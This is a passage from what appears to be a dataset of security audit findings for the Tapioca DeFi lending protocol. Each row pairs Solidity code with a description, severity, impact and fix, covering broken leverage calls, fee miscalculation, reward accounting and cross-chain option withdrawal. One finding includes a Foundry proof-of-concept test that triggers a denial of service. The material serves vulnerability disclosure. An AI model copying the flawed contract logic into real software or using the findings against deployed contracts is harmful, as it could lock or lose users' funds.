calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n// Remove the line below\\n address(asset).safeApprove(address(yieldBox), type(uint256).max);\\n// Remove the line below\\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); // TODO Check for rounding attack?\\n// Remove the line below\\n address(asset).safeApprove(address(yieldBox), 0);\\n// Add the line below\\n address(collateral).safeApprove(address(yieldBox), type(uint256).max);\\n// Add the line below\\n yieldBox.depositAsset(collateralId, address(this), calldata_.from, 0, collateralShare);\\n// Add the line below\\n address(collateral).safeApprove(address(yieldBox), 0);\\n\\n if (collateralShare == 0) revert CollateralShareNotValid();\\n _allowedBorrow(calldata_.from, collateralShare);\\n _addCollateral(calldata_.from, calldata_.from, false, 0, collateralShare);\\n }\\n```\\n",`buyCollateral()` does not work properly.,"```\\n function buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n if (address(leverageExecutor) == address(0)) {\\n revert LeverageExecutorNotValid();\\n }\\n\\n // Stack too deep fix\\n _BuyCollateralCalldata memory calldata_;\\n _BuyCollateralMemoryData memory memoryData;\\n {\\n calldata_.from = from;\\n calldata_.borrowAmount = borrowAmount;\\n calldata_.supplyAmount = supplyAmount;\\n calldata_.data = data;\\n }\\n\\n {\\n uint256 supplyShare = yieldBox.toShare(assetId, calldata_.supplyAmount, true);\\n if (supplyShare > 0) {\\n (memoryData.supplyShareToAmount,) =\\n yieldBox.withdraw(assetId, calldata_.from, address(leverageExecutor), 0, supplyShare);\\n }\\n }\\n\\n {\\n (, uint256 borrowShare) = _borrow(\\n calldata_.from,\\n address(this),\\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n );\\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n {\\n amountOut = leverageExecutor.getCollateral(\\n collateralId,\\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n address(asset).safeApprove(address(yieldBox), type(uint256).max);\\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); // TODO Check for rounding attack?\\n address(asset).safeApprove(address(yieldBox), 0);\\n\\n if (collateralShare == 0) revert CollateralShareNotValid();\\n _allowedBorrow(calldata_.from, collateralShare);\\n _addCollateral(calldata_.from, calldata_.from, false, 0, collateralShare);\\n }\\n```\\n" +DoS in BBLeverage and SGLLeverage due to using wrong leverage executor interface,medium,"A DoS takes place due to utilizing a wrong interface in the leverage modules.\\n`BBLeverage.sol` and `SGLLeverage.sol` use a wrong interface to interact with the `leverageExecutor` contract. This will make the `sellCollateral()` and `buyCollateral()` functions always fail and render the `BBLeverage.sol` and `SGLLeverage.sol` unusable.\\nAs we can see in the following snippets, when these contracts interact with the `leverageExecutor` to call its `getAsset()` and `getCollateral()` functions, they do it passing 6 parameters in each of the functions:\\n```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n // rest of code\\n\\n \\n { \\n amountOut = leverageExecutor.getCollateral( \\n collateralId, \\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n // rest of code\\n }\\n \\n function sellCollateral(address from, uint256 share, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageSell)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n // rest of code\\n\\n amountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), memoryData.leverageAmount, from, data\\n ); \\n\\n // rest of code\\n } \\n```\\n\\nHowever, the leverage executor's `getAsset()` and `getCollateral()` functions have just 4 parameters, as seen in the `BaseLeverageExecutor.sol` base contract used to build all leverage executors:\\n```\\n// BaseLeverageExecutor.sol\\n\\n/**\\n * @notice Buys an asked amount of collateral with an asset using the ZeroXSwapper.\\n * @dev Expects the token to be already transferred to this contract.\\n * @param assetAddress asset address.\\n * @param collateralAddress collateral address.\\n * @param assetAmountIn amount to swap.\\n * @param data SLeverageSwapData.\\n */\\n function getCollateral(address assetAddress, address collateralAddress, uint256 assetAmountIn, bytes calldata data)\\n external\\n payable\\n virtual\\n returns (uint256 collateralAmountOut)\\n {}\\n\\n /**\\n * @notice Buys an asked amount of asset with a collateral using the ZeroXSwapper.\\n * @dev Expects the token to be already transferred to this contract.\\n * @param collateralAddress collateral address.\\n * @param assetAddress asset address.\\n * @param collateralAmountIn amount to swap.\\n * @param data SLeverageSwapData.\\n */\\n function getAsset(address collateralAddress, address assetAddress, uint256 collateralAmountIn, bytes calldata data)\\n external\\n virtual\\n returns (uint256 assetAmountOut)\\n {}\\n```\\n",Update the interface used in BBLeverage.sol and SGLLeverage.sol and pass the proper parameters so that calls can succeed.,"High. Calls to the leverage modules will always fail, rendering these features unusable.","```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n // rest of code\\n\\n \\n { \\n amountOut = leverageExecutor.getCollateral( \\n collateralId, \\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n // rest of code\\n }\\n \\n function sellCollateral(address from, uint256 share, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageSell)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n // rest of code\\n\\n amountOut = leverageExecutor.getAsset(\\n assetId, address(collateral), address(asset), memoryData.leverageAmount, from, data\\n ); \\n\\n // rest of code\\n } \\n```\\n" +Variable opening fee will always be wrongly computed if collateral is not a stablecoin,medium,"Borrowing fees will be computed wrongly because of a combination of hardcoded values and a wrongly implemented setter function.\\nTapioca applies a linearly scaling creation fee to open a new CDP in Big Bang markets. This is done via the internal `_computeVariableOpeningFee()` function every time a new borrow is performed.\\nIn order to compute the variable fee, the exchange rate will be queried. This rate is important in order to understand the current price of USDO related to the collateral asset.\\nIf `_exchangeRate >= minMintFeeStart`, then `minMintFee` will be applied.\\nIf `_exchangeRate <= maxMintFeeStart`, then `maxMintFee` will be applied\\nOtherwise, a proportional percentage will be applied to compue the fee\\nAs per the comment in the code snippet shows below, Tapioca wrongly assumes that the exchange rate will always be `USDO <> USDC`, when in reality the actual collateral will dictate the exchange rate returned.\\nIt is also important to note the fact that contrary to what one would assume, `maxMintFeeStart` is assumed to be smaller than `minMintFeeStart` in order to perform the calculations:\\n```\\n// BBLendingCommon.sol\\n\\nfunction _computeVariableOpeningFee(uint256 amount) internal returns (uint256) {\\n if (amount == 0) return 0; \\n \\n //get asset <> USDC price ( USDO <> USDC ) \\n (bool updated, uint256 _exchangeRate) = assetOracle.get(oracleData); \\n if (!updated) revert OracleCallFailed();\\n \\n if (_exchangeRate >= minMintFeeStart) { \\n return (amount * minMintFee) / FEE_PRECISION;\\n }\\n if (_exchangeRate <= maxMintFeeStart) { \\n return (amount * maxMintFee) / FEE_PRECISION;\\n }\\n \\n uint256 fee = maxMintFee\\n - (((_exchangeRate - maxMintFeeStart) * (maxMintFee - minMintFee)) / (minMintFeeStart - maxMintFeeStart)); \\n \\n if (fee > maxMintFee) return (amount * maxMintFee) / FEE_PRECISION;\\n if (fee < minMintFee) return (amount * minMintFee) / FEE_PRECISION;\\n\\n if (fee > 0) {\\n return (amount * fee) / FEE_PRECISION;\\n }\\n return 0;\\n }\\n```\\n\\nIt is also important to note that `minMintFeeStart` and `maxMintFeeStart` are hardcoded when being initialized inside `BigBang.sol` (as mentioned, `maxMintFeeStart` is smaller than minMintFeeStart):\\n```\\n// BigBang.sol\\n\\nfunction _initCoreStorage(\\n IPenrose _penrose,\\n IERC20 _collateral,\\n uint256 _collateralId,\\n ITapiocaOracle _oracle,\\n uint256 _exchangeRatePrecision,\\n uint256 _collateralizationRate,\\n uint256 _liquidationCollateralizationRate,\\n ILeverageExecutor _leverageExecutor\\n ) private {\\n // rest of code\\n \\n maxMintFeeStart = 975000000000000000; // 0.975 *1e18\\n minMintFeeStart = 1000000000000000000; // 1*1e18\\n\\n // rest of code\\n } \\n```\\n\\nWhile the values hardcoded initially to values that are coherent for a USDO <> stablecoin exchange rate, these values won't make sense if we find ourselves fetching an exchcange rate of an asset not stable.\\nLet's say the collateral asset is ETH. If ETH is at 4000$, then the exchange rate will return a value of 0,00025. This will make the computation inside `_computeVariableOpeningFee()` always apply the maximum fee when borrowing because `_exchangeRate` is always smaller than `maxMintFeeStart` by default.\\nAlthough this has an easy fix (changing the values stored in `maxMintFeeStart` and minMintFeeStart), this can't be properly done because the `setMinAndMaxMintRange()` function wrongly assumes that `minMintFeeStart` must be smaller than `maxMintFeeStart` (against what the actual calculations dictate in the _computeVariableOpeningFee()):\\n```\\n// BigBang.sol\\n\\nfunction setMinAndMaxMintRange(uint256 _min, uint256 _max) external onlyOwner {\\n emit UpdateMinMaxMintRange(minMintFeeStart, _min, maxMintFeeStart, _max);\\n\\n if (_min >= _max) revert NotValid(); \\n\\n minMintFeeStart = _min;\\n maxMintFeeStart = _max;\\n } \\n```\\n\\nThis will make it impossible to properly update the `maxMintFeeStart` and `minMintFeeStart` to have proper values because if it is enforced that `maxMintFeeStart` > than `minMintFeeStart`, then `_computeVariableOpeningFee()` will always enter the first `if (_exchangeRate >= minMintFeeStart)` and wrongly return the minimum fee.","The mitigation for this is straightforward. Change the `setMinAndMaxMintRange()` function so that `_max` is enforced to be smaller than _min:\\n```\\n// BigBang.sol\\n\\nfunction setMinAndMaxMintRange(uint256 _min, uint256 _max) external onlyOwner {\\n emit UpdateMinMaxMintRange(minMintFeeStart, _min, maxMintFeeStart, _max);\\n\\n// Remove the line below\\n if (_min >= _max) revert NotValid(); \\n// Add the line below\\n if (_max >= _min) revert NotValid(); \\n\\n minMintFeeStart = _min;\\n maxMintFeeStart = _max;\\n } \\n```\\n\\nAlso, I would recommend not to hardcode the values of `maxMintFeeStart` and `minMintFeeStart` and pass them as parameter instead, inside `_initCoreStorage()` , as they should always be different considering the collateral configured for that market.","Medium. Although this looks like a bug that doesn't have a big impact in the protocol, it actually does. The fees will always be wrongly applied for collaterals different from stablecoins, and applying these kind of fees when borrowing is one of the core mechanisms to keep USDO peg, as described in Tapioca's documentation. If this mechanisms doesn't work properly, users won't be properly incentivized to borrow/repay considering the different market conditions that might take place and affect USDO's peg to $1.","```\\n// BBLendingCommon.sol\\n\\nfunction _computeVariableOpeningFee(uint256 amount) internal returns (uint256) {\\n if (amount == 0) return 0; \\n \\n //get asset <> USDC price ( USDO <> USDC ) \\n (bool updated, uint256 _exchangeRate) = assetOracle.get(oracleData); \\n if (!updated) revert OracleCallFailed();\\n \\n if (_exchangeRate >= minMintFeeStart) { \\n return (amount * minMintFee) / FEE_PRECISION;\\n }\\n if (_exchangeRate <= maxMintFeeStart) { \\n return (amount * maxMintFee) / FEE_PRECISION;\\n }\\n \\n uint256 fee = maxMintFee\\n - (((_exchangeRate - maxMintFeeStart) * (maxMintFee - minMintFee)) / (minMintFeeStart - maxMintFeeStart)); \\n \\n if (fee > maxMintFee) return (amount * maxMintFee) / FEE_PRECISION;\\n if (fee < minMintFee) return (amount * minMintFee) / FEE_PRECISION;\\n\\n if (fee > 0) {\\n return (amount * fee) / FEE_PRECISION;\\n }\\n return 0;\\n }\\n```\\n" +Not properly tracking debt accrual leads mintOpenInterestDebt() to lose twTap rewards,medium,"Debt accrual is tracked wrongly, making the expected twTap rewards to be potentially lost.\\nPenrose's `mintOpenInterestDebt()` function allows USDO to be minted and distributed as a reward to twTap holders based on the current USDO open interest.\\nIn order to mint and distribute rewards, `mintOpenInterestDebt()` will perform the following steps:\\nQuery the current `USDO.supply()`\\nCompute the total debt from all the markets (Origins included)\\nIf `totalUsdoDebt > usdoSupply`, then distribute the difference among the twTap holders\\n```\\nfunction mintOpenInterestDebt(address twTap) external onlyOwner { \\n uint256 usdoSupply = usdoToken.totalSupply();\\n\\n // nothing to mint when there's no activity\\n if (usdoSupply > 0) { \\n // re-compute latest debt\\n uint256 totalUsdoDebt = computeTotalDebt(); \\n \\n //add Origins debt \\n //Origins market doesn't accrue in time but increases totalSupply\\n //and needs to be taken into account here\\n uint256 len = allOriginsMarkets.length;\\n for (uint256 i; i < len; i++) {\\n IMarket market = IMarket(allOriginsMarkets[i]);\\n if (isOriginRegistered[address(market)]) {\\n (uint256 elastic,) = market.totalBorrow();\\n totalUsdoDebt += elastic;\\n }\\n }\\n \\n //debt should always be > USDO supply\\n if (totalUsdoDebt > usdoSupply) { \\n uint256 _amount = totalUsdoDebt - usdoSupply;\\n\\n //mint against the open interest; supply should be fully minted now\\n IUsdo(address(usdoToken)).mint(address(this), _amount);\\n\\n //send it to twTap\\n uint256 rewardTokenId = ITwTap(twTap).rewardTokenIndex(address(usdoToken));\\n _distributeOnTwTap(_amount, rewardTokenId, address(usdoToken), ITwTap(twTap));\\n }\\n } \\n }\\n```\\n\\nThis approach has two main issues that make the current reward distribution malfunction:\\nBecause debt is not actually tracked and is instead directly queried from the current total borrows via `computeTotalDebt()`, if users repay their debt prior to a reward distribution this debt won't be considered for the fees, given that fees will always be calculated considering the current `totalUsdoDebt` and `usdoSupply`.\\nBridging USDO is not considered\\nIf USDO is bridged from another chain to the current chain, then the `usdoToken.totalSupply()` will increment but the `totalUsdoDebt()` won't. This will make rewards never be distributed because `usdoSupply` will always be greater than `totalUsdoDebt`.\\nOn the other hand, if USDO is bridged from the current chain to another chain, the `usdoToken.totalSupply()` will decrement and tokens will be burnt, while `totalUsdoDebt()` will remain the same. This will make more rewards than the expected ones to be distributed because `usdoSupply` will be way smaller than `totalUsdoDebt`.\\nConsider the following scenario: 1000 USDO are borrowed, and already 50 USDO have been accrued as debt.\\nThis makes USDO's totalSupply() to be 1000, while `totalUsdoDebt` be 1050 USDO. If `mintOpenInterestDebt()` is called, 50 USDO should be minted and distributed among twTap holders.\\nHowever, prior to executing `mintOpenInterestDebt()`, a user bridges 100 USDO from chain B, making the total supply increment from 1000 USDO to 1100 USDO. Now, totalSupply() is 1100 USDO, while `totalUsdoDebt` is still 1050, making rewards not be distributed among users because `totalUsdoDebt` < usdoSupply.","One of the possible fixes for this issue is to track debt with a storage variable. Every time a repay is performed, the difference between elastic and base could be accrued to the variable, and such variable could be decremented when the fees distributions are performed. This makes it easier to compute the actual rewards and mitigates the cross-chain issue.","Medium. The fees to be distributed in twTap are likely to always be wrong, making one of the core governance functionalities (locking TAP in order to participate in Tapioca's governance) be broken given that fee distributions (and thus the incentives to participate in governance) won't be correct.","```\\nfunction mintOpenInterestDebt(address twTap) external onlyOwner { \\n uint256 usdoSupply = usdoToken.totalSupply();\\n\\n // nothing to mint when there's no activity\\n if (usdoSupply > 0) { \\n // re-compute latest debt\\n uint256 totalUsdoDebt = computeTotalDebt(); \\n \\n //add Origins debt \\n //Origins market doesn't accrue in time but increases totalSupply\\n //and needs to be taken into account here\\n uint256 len = allOriginsMarkets.length;\\n for (uint256 i; i < len; i++) {\\n IMarket market = IMarket(allOriginsMarkets[i]);\\n if (isOriginRegistered[address(market)]) {\\n (uint256 elastic,) = market.totalBorrow();\\n totalUsdoDebt += elastic;\\n }\\n }\\n \\n //debt should always be > USDO supply\\n if (totalUsdoDebt > usdoSupply) { \\n uint256 _amount = totalUsdoDebt - usdoSupply;\\n\\n //mint against the open interest; supply should be fully minted now\\n IUsdo(address(usdoToken)).mint(address(this), _amount);\\n\\n //send it to twTap\\n uint256 rewardTokenId = ITwTap(twTap).rewardTokenIndex(address(usdoToken));\\n _distributeOnTwTap(_amount, rewardTokenId, address(usdoToken), ITwTap(twTap));\\n }\\n } \\n }\\n```\\n" +USDO's MSG_TAP_EXERCISE compose messages where exercised options must be withdrawn to another chain will always fail due to wrongly requiring sendParam's to address to be whitelisted in the Cluster,medium,"Wrongly checking for the sendParam's `to` address `to` be whitelisted when bridging exercised options will make such calls always fail.\\nOne of the compose messages allowed in USDO is `MSG_TAP_EXERCISE`. This type of message will trigger UsdoOptionReceiverModule's `exerciseOptionsReceiver()` function, which allows users to exercise their options and obtain the corresponding exercised tapOFTs.\\nUsers can choose to obtain their tapOFTs in the chain where `exerciseOptionsReceiver()` is being executed, or they can choose to send a message to a destination chain of their choice. If users decide to bridge the exercised option, the `lzSendParams` fields contained in the `ExerciseOptionsMsg` struct decoded from the `_data` passed as parameter in `exerciseOptionsReceiver()` should be filled with the corresponding data to perform the cross-chain call.\\nThe problem is that the `exerciseOptionsReceiver()` performs an unnecessary validation that requires the `to` parameter inside the `lzSendParams` `to` be whitelisted in the protocol's cluster:\\n```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n // Decode received message.\\n ExerciseOptionsMsg memory msg_ = UsdoMsgCodec.decodeExerciseOptionsMsg(_data);\\n \\n _checkWhitelistStatus(msg_.optionsData.target);\\n _checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to)); // <---- This validation is wrong \\n // rest of code\\n \\n \\n }\\n```\\n\\n`msg_.lzSendParams.sendParam.to` corresponds to the address that will obtain the tokens in the destination chain after bridging the exercised option, which can and should actually be any address that the user exercising the option decides, so this address shouldn't be required to be whitelisted in the protocol's Cluster (given that the Cluster only whitelists certain protocol-related addresses such as contracts or special addresses).\\nBecause of this, transactions where users try to bridge the exercised options will always fail because the `msg_.lzSendParams.sendParam.to` address specified by users will never be whitelisted in the Cluster.","Remove the whitelist check against the `msg_.lzSendParams.sendParam.to` param inexerciseOptionsReceiver():\\n```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n // Decode received message.\\n ExerciseOptionsMsg memory msg_ = UsdoMsgCodec.decodeExerciseOptionsMsg(_data);\\n \\n _checkWhitelistStatus(msg_.optionsData.target);\\n// Remove the line below\\n _checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to)); \\n // rest of code\\n \\n \\n }\\n```\\n","High. The functionality of exercising options and bridging them in the same transaction is one of the wide range of core functionalities that should be completely functional in Tapioca. However, this functionality will always fail due to the mentioned issue, forcing users to only be able to exercise options in the same chain.","```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n // Decode received message.\\n ExerciseOptionsMsg memory msg_ = UsdoMsgCodec.decodeExerciseOptionsMsg(_data);\\n \\n _checkWhitelistStatus(msg_.optionsData.target);\\n _checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to)); // <---- This validation is wrong \\n // rest of code\\n \\n \\n }\\n```\\n" +"Withdrawing to other chain when exercising options won't work as expected, leading to DoS",medium,"Withdrawing to another chain when exercising options will always fail because the implemented functionality does not bridge the tokens exercised in the option, and tries to perform a regular cross-chain call instead.\\nTapioca incorporates a DAO Share Options (DSO) program where users can lock USDO in order to obtain TAP tokens at a discounted price.\\nIn order to exercise their options, users need to execute a compose call with a message type of `MSG_TAP_EXERCISE`, which will trigger the UsdoOptionReceiverModule's `exerciseOptionsReceiver()` function.\\nWhen exercising their options, users can decide to bridge the obtained TAP tokens into another chain by setting the `msg_.withdrawOnOtherChain` to true:\\n```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n \\n // rest of code \\n \\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token \\n _options.tapAmount \\n ); \\n \\n // rest of code\\n \\n address tapOft = ITapiocaOptionBroker(_options.target).tapOFT();\\n if (msg_.withdrawOnOtherChain) {\\n // rest of code \\n\\n // Sends to source and preserve source `msg.sender` (`from` in this case).\\n _sendPacket(msg_.lzSendParams, msg_.composeMsg, _options.from); \\n\\n // Refund extra amounts\\n if (_options.tapAmount - amountToSend > 0) {\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount - amountToSend);\\n }\\n } else {\\n //send on this chain\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount);\\n }\\n }\\n } \\n```\\n\\nAs the code snippet shows, `exerciseOptionsReceiver()` will perform mainly 2 steps:\\nExercise the option by calling `_options.target.exerciseOption()` . This will make USDO tokens serving as a payment for the `tapOft` tokens be transferred from the user, and in exchange the corresponding option `tapOft` tokens will be transferred to the USDO contract so that they can later be transferred to the user.\\nTAP tokens will be sent to the user. This can be done in two ways:\\nIf the user doesn't decide to bridge them (by leaving `msg_.withdrawOnOtherChain` as false), the `tapOft` tokens will simply be transferred to the `_options.from` address, succesfully exercising the option\\nOn the other hand, if the user decides to bridge the exercised option, the internal `_sendPacket()` function will be triggered, which will perform a call via LayerZero to the destination chain:\\n`// UsdoOptionReceiverModule.sol\\n\\nfunction _sendPacket(LZSendParam memory _lzSendParam, bytes memory _composeMsg, address _srcChainSender)\\n private\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n /// @dev Applies the token transfers regarding this send() operation.\\n // - amountDebitedLD is the amount in local decimals that was ACTUALLY debited from the sender.\\n // - amountToCreditLD is the amount in local decimals that will be credited to the recipient on the remote OFT instance.\\n (uint256 amountDebitedLD, uint256 amountToCreditLD) =\\n _debit(_lzSendParam.sendParam.amountLD, _lzSendParam.sendParam.minAmountLD, _lzSendParam.sendParam.dstEid);\\n \\n /// @dev Builds the options and OFT message to quote in the endpoint.\\n (bytes memory message, bytes memory options) = _buildOFTMsgAndOptionsMemory(\\n _lzSendParam.sendParam, _lzSendParam.extraOptions, _composeMsg, amountToCreditLD, _srcChainSender\\n );\\n \\n /// @dev Sends the message to the LayerZero endpoint and returns the LayerZero msg receipt.\\n msgReceipt =\\n _lzSend(_lzSendParam.sendParam.dstEid, message, options, _lzSendParam.fee, _lzSendParam.refundAddress);\\n /// @dev Formulate the OFT receipt.\\n oftReceipt = OFTReceipt(amountDebitedLD, amountToCreditLD);\\n\\n emit OFTSent(msgReceipt.guid, _lzSendParam.sendParam.dstEid, msg.sender, amountDebitedLD);\\n }`\\nThe problem with the approach followed when users want to bridge the exercised options is that the contract will not actually bridge the exercised `tapOft` tokens by calling the tapOft's `sendPacket()` function (which is the actual way by which the token can be transferred cross-chain). Instead, the contract calls `_sendPacket()` , a function that will try to perform a USDO cross-chain call (instead of a `tapOft` cross-chain call). This will make the `_debit()` function inside `_sendPacket()` be executed, which will try to burn USDO tokens from the msg.sender:\\n```\\n// OFT.sol \\n\\nfunction _debit(\\n uint256 _amountLD, \\n uint256 _minAmountLD,\\n uint32 _dstEid\\n ) internal virtual override returns (uint256 amountSentLD, uint256 amountReceivedLD) {\\n (amountSentLD, amountReceivedLD) = _debitView(_amountLD, _minAmountLD, _dstEid);\\n \\n // @dev In NON-default OFT, amountSentLD could be 100, with a 10% fee, the amountReceivedLD amount is 90,\\n // therefore amountSentLD CAN differ from amountReceivedLD.\\n \\n // @dev Default OFT burns on src.\\n _burn(msg.sender, amountSentLD);\\n }\\n```\\n\\nThis leads to two possible outcomes:\\n`msg.sender` (the LayerZero endpoint) has enough `amountSentLD` of USDO tokens to be burnt. In this situation, USDO tokens will be incorrectly burnt from the user, leading to a loss of balance for him. After this, the burnt USDO tokens will be bridged. This outcome greatly affect the user in two ways:\\nUSDO tokens are incorrectly burnt from his balance\\nThe exercised `tapOft` tokens remain stuck forever in the USDO contract because they are never actually bridged\\nThe most probable: `msg.sender` (LayerZero endpoint) does not have enough `amountSentLD` of USDO tokens to be burnt. In this case, an error will be thrown and the whole call will revert, leading to a DoS\\nProof of Concept\\nThe following poc shows how the function will be DoS'ed due to the sender not having enough USDO to be burnt. In order to execute the Poc, perform the following steps:\\nRemove the `_checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to));` line in UsdoOptionReceiverModule.sol's `exerciseOptionsReceiver()` function (it is wrong and related to another vulnerability)\\nPaste the following code in Tapioca-bar/test/Usdo.t.sol:\\n`// Usdo.t.sol\\n\\nfunction testVuln_exercise_option() public {\\n uint256 erc20Amount_ = 1 ether;\\n\\n //setup\\n {\\n deal(address(aUsdo), address(this), erc20Amount_);\\n\\n // @dev send TAP to tOB\\n deal(address(tapOFT), address(tOB), erc20Amount_);\\n\\n // @dev set `paymentTokenAmount` on `tOB`\\n tOB.setPaymentTokenAmount(erc20Amount_);\\n }\\n \\n //useful in case of withdraw after borrow\\n LZSendParam memory withdrawLzSendParam_;\\n MessagingFee memory withdrawMsgFee_; // Will be used as value for the composed msg\\n\\n {\\n // @dev `withdrawMsgFee_` is to be airdropped on dst to pay for the send to source operation (B->A).\\n PrepareLzCallReturn memory prepareLzCallReturn1_ = usdoHelper.prepareLzCall( // B->A data\\n IUsdo(address(bUsdo)),\\n PrepareLzCallData({\\n dstEid: aEid,\\n recipient: OFTMsgCodec.addressToBytes32(address(this)),\\n amountToSendLD: erc20Amount_,\\n minAmountToCreditLD: erc20Amount_,\\n msgType: SEND,\\n composeMsgData: ComposeMsgData({\\n index: 0,\\n gas: 0,\\n value: 0,\\n data: bytes(""""),\\n prevData: bytes(""""),\\n prevOptionsData: bytes("""")\\n }),\\n lzReceiveGas: 500_000,\\n lzReceiveValue: 0\\n })\\n );\\n withdrawLzSendParam_ = prepareLzCallReturn1_.lzSendParam;\\n withdrawMsgFee_ = prepareLzCallReturn1_.msgFee;\\n }\\n\\n /**\\n * Actions\\n */\\n uint256 tokenAmountSD = usdoHelper.toSD(erc20Amount_, aUsdo.decimalConversionRate());\\n\\n //approve magnetar\\n ExerciseOptionsMsg memory exerciseMsg = ExerciseOptionsMsg({\\n optionsData: IExerciseOptionsData({\\n from: address(this),\\n target: address(tOB), \\n paymentTokenAmount: tokenAmountSD,\\n oTAPTokenID: 0, // @dev ignored in TapiocaOptionsBrokerMock\\n tapAmount: tokenAmountSD\\n }),\\n withdrawOnOtherChain: true,\\n lzSendParams: LZSendParam({\\n sendParam: SendParam({\\n dstEid: 0,\\n to: ""0x"",\\n amountLD: erc20Amount_,\\n minAmountLD: erc20Amount_,\\n extraOptions: ""0x"",\\n composeMsg: ""0x"",\\n oftCmd: ""0x""\\n }),\\n fee: MessagingFee({nativeFee: 0, lzTokenFee: 0}),\\n extraOptions: ""0x"",\\n refundAddress: address(this)\\n }),\\n composeMsg: ""0x""\\n });\\n bytes memory sendMsg_ = usdoHelper.buildExerciseOptionMsg(exerciseMsg);\\n\\n PrepareLzCallReturn memory prepareLzCallReturn2_ = usdoHelper.prepareLzCall(\\n IUsdo(address(aUsdo)),\\n PrepareLzCallData({\\n dstEid: bEid,\\n recipient: OFTMsgCodec.addressToBytes32(address(this)),\\n amountToSendLD: erc20Amount_,\\n minAmountToCreditLD: erc20Amount_,\\n msgType: PT_TAP_EXERCISE,\\n composeMsgData: ComposeMsgData({\\n index: 0,\\n gas: 500_000,\\n value: uint128(withdrawMsgFee_.nativeFee),\\n data: sendMsg_,\\n prevData: bytes(""""),\\n prevOptionsData: bytes("""")\\n }),\\n lzReceiveGas: 500_000,\\n lzReceiveValue: 0\\n })\\n );\\n bytes memory composeMsg_ = prepareLzCallReturn2_.composeMsg;\\n bytes memory oftMsgOptions_ = prepareLzCallReturn2_.oftMsgOptions;\\n MessagingFee memory msgFee_ = prepareLzCallReturn2_.msgFee;\\n LZSendParam memory lzSendParam_ = prepareLzCallReturn2_.lzSendParam;\\n\\n (MessagingReceipt memory msgReceipt_,) = aUsdo.sendPacket{value: msgFee_.nativeFee}(lzSendParam_, composeMsg_);\\n\\n {\\n verifyPackets(uint32(bEid), address(bUsdo));\\n\\n vm.expectRevert(""ERC20: burn amount exceeds balance"");\\n this.lzCompose(\\n bEid,\\n address(bUsdo),\\n oftMsgOptions_,\\n msgReceipt_.guid,\\n address(bUsdo),\\n abi.encodePacked(\\n OFTMsgCodec.addressToBytes32(address(this)), composeMsg_\\n )\\n ); \\n\\n }\\n\\n }`\\nRun the poc with the following command, inside the Tapioca-bar repo: `forge test --mt testVuln_exercise_option`\\nWe can see how the ""ERC20: burn amount exceeds balance"" error is thrown due to the issue mentioned in the report.","If users decide to bridge their exercised tapOft, the sendPacket() function incorporated in the tapOft contract should be used instead of UsdoOptionReceiverModule's internal _sendPacket() function, so that the actual bridged asset is the tapOft and not the USDO.","High. As demonstrated, two critical outcomes might affect the user:\\n`tapOft` funds will remain stuck forever in the USDO contract and USDO will be incorrectly burnt from `msg.sender`\\nThe core functionality of exercising and bridging options always reverts and effectively causes a DoS.","```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n \\n // rest of code \\n \\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token \\n _options.tapAmount \\n ); \\n \\n // rest of code\\n \\n address tapOft = ITapiocaOptionBroker(_options.target).tapOFT();\\n if (msg_.withdrawOnOtherChain) {\\n // rest of code \\n\\n // Sends to source and preserve source `msg.sender` (`from` in this case).\\n _sendPacket(msg_.lzSendParams, 